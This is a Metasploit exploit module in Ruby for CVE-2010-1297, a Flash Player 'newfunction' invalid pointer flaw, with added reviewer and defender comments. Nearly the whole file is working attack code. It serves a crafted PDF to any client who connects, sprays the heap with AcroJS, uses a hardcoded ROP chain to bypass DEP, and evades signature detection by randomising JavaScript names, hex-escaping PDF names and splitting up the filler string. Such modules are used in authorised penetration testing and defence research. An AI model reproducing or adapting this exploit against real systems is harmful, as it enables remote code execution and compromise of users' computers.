Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

# Exploit module for CVE-2010-1297 ("newfunction"), an invalid pointer use in
# the DoABC tag handling of Adobe Flash Player 9.x / 10.0.
#
# Delivery path (see +on_request_uri+): an HTTP request is answered with a
# generated PDF that embeds a static, pre-built SWF (loaded from the framework
# data directory in +exploit+) as a RichMedia annotation and an OpenAction
# JavaScript heap spray (+make_js+). The ROP chain in +make_js+ is built from
# hardcoded BIB.dll addresses, so the module is tied to the specific Adobe
# Reader builds listed under 'Targets' — the module's own description notes
# the hardcoded syscall number makes it unlikely to work elsewhere.
#
# Defender notes (derived from the PDF structure built in +make_pdf+): the
# document uses /OpenAction -> /JavaScript, a /RichMedia annotation carrying
# an /EmbeddedFile SWF, a FlateDecode + ASCIIHexDecode JS stream, and PDF
# name obfuscation via #xx escapes (+n_obfu+). Static detection should
# normalise escaped names before matching on /JavaScript, /OpenAction or
# /RichMedia.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (name, references, payload constraints, targets).
  #
  # Payload 'Space' is 1000 bytes with NUL as the only bad character; NOPs are
  # disabled because the payload is placed by the JavaScript heap spray, not
  # by a classic buffer overflow.
  #
  # @param info [Hash] module info passed in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
        'Description' => %q{
          This module exploits a vulnerability in the DoABC tag handling within
          versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
          vulnerable, as are any other applications that may embed Flash player.

          Arbitrary code execution is achieved by embedding a specially crafted Flash
          movie into a PDF document. An AcroJS heap spray is used in order to ensure
          that the memory used by the invalid pointer issue is controlled.

          NOTE: This module uses a similar DEP bypass method to that used within the
          adobe_libtiff module. This method is unlikely to work across various
          Windows versions due a hardcoded syscall number.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Found being openly exploited
          'jduck' # Metasploit version
        ],
        'References' => [
          ['CVE', '2010-1297'],
          ['OSVDB', '65141'],
          ['BID', '40586'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
          # For SWF->PDF embedding
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Only one target: the gadget addresses in make_js are fixed, so there is
          # nothing per-target to select.
          [ 'Automatic', {}],
        ],
        'DisclosureDate' => '2010-06-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the static SWF trigger file into +@swf_data+ and then starts the
  # HTTP server via +super+.
  #
  # The SWF is read once here rather than per request. +File.open+ raises
  # +Errno::ENOENT+ if the data file is missing, which aborts the module
  # before any listener is started.
  #
  # NOTE(review): the handle is closed manually rather than with the block
  # form of File.open / File.binread, so an exception between open and close
  # would leak the descriptor. Behaviour is otherwise equivalent.
  def exploit
    # load the static swf file
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")
    fd = File.open(path, "rb")
    @swf_data = fd.read(fd.stat.size)
    fd.close

    super
  end

  # Serves the crafted PDF to every client request and then hands the
  # connection to the payload handler.
  #
  # The +request+ argument is not inspected: any URI under the server path
  # receives the same document. The payload is re-encoded per client
  # (+regenerate_payload+), so each served PDF differs in its JS stream.
  #
  # @param cli [Object] client connection object supplied by the HTTP server mixin
  # @param request [Object] the parsed HTTP request (unused)
  def on_request_uri(cli, request)
    print_status("Sending crafted PDF w/SWF")

    js_data = make_js(regenerate_payload(cli).encoded)
    pdf_data = make_pdf(@swf_data, js_data)
    # 'Pragma: no-cache' discourages intermediaries from caching the per-client document.
    send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end

  # Builds the AcroJS heap-spray script that places the ROP chain followed by
  # the encoded payload into memory.
  #
  # +stack_data+ is a fixed list of BIB.dll gadget addresses and constants
  # packed as little-endian 32-bit values ('V*'); it is prepended to
  # +encoded_payload+ and the whole buffer is emitted via
  # +Rex::Text.to_unescape+ for JavaScript's +unescape+. Every JavaScript
  # identifier is randomised with +rand_text_alpha+ so the script text differs
  # per request (a simple signature-evasion measure).
  #
  # Because every address below is hardcoded, this chain only matches the
  # specific BIB.dll build shipped with the Reader versions listed under
  # 'Targets'.
  #
  # @param encoded_payload [String] the encoded payload bytes (presumably a
  #   String; comes from regenerate_payload(cli).encoded)
  # @return [String] JavaScript source to be embedded in the PDF
  def make_js(encoded_payload)
    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    # Randomised JavaScript identifiers, one per variable used in the script.
    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    # NOTE(review): var_start is assigned but never referenced in the script below.
    var_start = rand_text_alpha(rand(100) + 1)

    # Size (in JS string length units) each spray block is padded up to.
    var_s = 0x10000
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    # ROP chain first, then the payload; the JS places this buffer at a fixed
    # offset inside every spray block.
    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    # The '%u0c0c' filler is assembled from single-character pieces so the
    # literal "%u0c0c" never appears in the served script.
    js = %Q|
    var #{var_unescape} = unescape;
    var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
    var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
    while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
    #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
    #{var_b} += #{var_shellcode};
    #{var_b} += #{var_c};
    #{var_d} = #{var_b}.substring(0, #{var_s}/2);
    while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
    #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
    var #{var_4} = new Array();
    for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
    |

    js
  end

  # Returns +count+ random bytes in the range 0x80..0xff as a binary string.
  #
  # Currently unused: the only caller is the commented-out PDF comment line in
  # +make_pdf+ (it was intended to add a non-ASCII marker after the header).
  #
  # @param count [Integer] number of bytes to produce
  # @return [String]
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # Formats the opening line of an indirect PDF object definition, e.g. "5 0 obj\n".
  #
  # @param id [Integer] object number (generation is always 0)
  # @return [String]
  def io_def(id)
    "%d 0 obj\n" % id
  end

  # Formats an indirect object reference, e.g. "5 0 R".
  #
  # @param id [Integer] object number (generation is always 0)
  # @return [String]
  def io_ref(id)
    "%d 0 R" % id
  end

  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  #
  # Randomly rewrites ASCII letters in a PDF name/dictionary fragment using the
  # PDF "#xx" hex escape (e.g. "J" may become "#4a"), with a 50% chance per
  # letter. Only characters whose upcase falls within 'A'..'Z' are touched, so
  # multi-byte characters and punctuation pass through unchanged, and the
  # resulting "#xx" is always exactly two hex digits.
  #
  # Defender note: this is a well-known evasion of naive substring matching on
  # PDF keywords; scanners should decode "#xx" escapes before inspecting names.
  #
  # @param str [String] dictionary / name text to obfuscate
  # @return [String]
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      # `and` is used here; it has lower precedence than `==`/`>=`, so the
      # condition reads as intended.
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  # Encodes +str+ for a PDF /ASCIIHexDecode filter: each byte becomes two hex
  # digits, separated by 1-3 random spaces, terminated by the ">" end-of-data
  # marker. The random whitespace varies the stream bytes between requests.
  #
  # @param str [String] raw bytes to encode
  # @return [String] ASCII hex text ending in ">"
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  # Assembles the PDF document: catalog -> pages -> one page with a RichMedia
  # annotation referencing the embedded SWF, plus an /OpenAction JavaScript
  # action whose stream (object 6) holds the deflated, hex-encoded spray script.
  #
  # Object numbers used are 1 and 3..16; object 2 is never defined. The xref
  # table below is written sequentially from +xref+, so its entries for objects
  # 3..16 are each one slot off and /Size (16) is one less than the highest
  # object number. NOTE(review): the tested readers evidently recover from the
  # inconsistent xref by rescanning; a strict parser may not.
  #
  # Note that "<<" mutates the string literals it is applied to ("endobj",
  # "%PDF-1.5"), so this file must not gain a frozen_string_literal magic comment
  # without reworking those lines.
  #
  # @param swf [String] the pre-built SWF bytes (already compressed)
  # @param js [String] the JavaScript source from +make_js+
  # @return [String] the complete PDF document
  def make_pdf(swf, js)
    # Random .swf filename used both as the annotation name and the embedded file name.
    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

    # Byte offsets of each object definition, in the order they are written.
    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    # pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
    pdf << n_obfu("/Pages ") << io_ref(3)
    pdf << n_obfu("/OpenAction ") << io_ref(5)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # js action
    xref << pdf.length
    # "+" binds tighter than "<<", so the dictionary text is joined first and
    # then appended as one piece.
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

    # js stream
    xref << pdf.length
    # Filters are applied by the reader in array order: FlateDecode, then ASCIIHexDecode.
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
    pdf << n_obfu("/Rect [20 20 187 69] ")
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media settings
    xref << pdf.length
    pdf << io_def(8)
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
    pdf << n_obfu("/Activation ") << io_ref(10)
    pdf << n_obfu("/Deactivation ") << io_ref(11)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media content
    xref << pdf.length
    pdf << io_def(9)
    pdf << n_obfu("<</Type/RichMediaContent")
    pdf << n_obfu("/Assets ") << io_ref(12)
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media activation / deactivation
    # /Condition/PO activates the annotation when the page opens; /XD
    # deactivates it when the page closes.
    xref << pdf.length
    pdf << io_def(10)
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << io_def(11)
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
    pdf << eol << endobj

    # rich media assets
    xref << pdf.length
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
    pdf << eol << endobj

    # swf embedded file ref
    xref << pdf.length
    pdf << io_def(13)
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.length
    pdf << io_def(14)
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
    pdf << eol << endobj

    # rich media instance
    xref << pdf.length
    pdf << io_def(15)
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
    pdf << n_obfu("/Asset ") << io_ref(13)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    # The SWF is written without any /Filter, so it is stored verbatim.
    xref << pdf.length
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
    pdf << "stream" << eol
    pdf << swf << eol
    pdf << "endstream" << eol
    pdf << endobj

    # trailing stuff
    # xref subsection "0 N": entry 0 is the mandatory free entry, followed by
    # one in-use entry per recorded offset (see the object-number caveat above).
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol

    pdf << "%%EOF" << eol

  end
end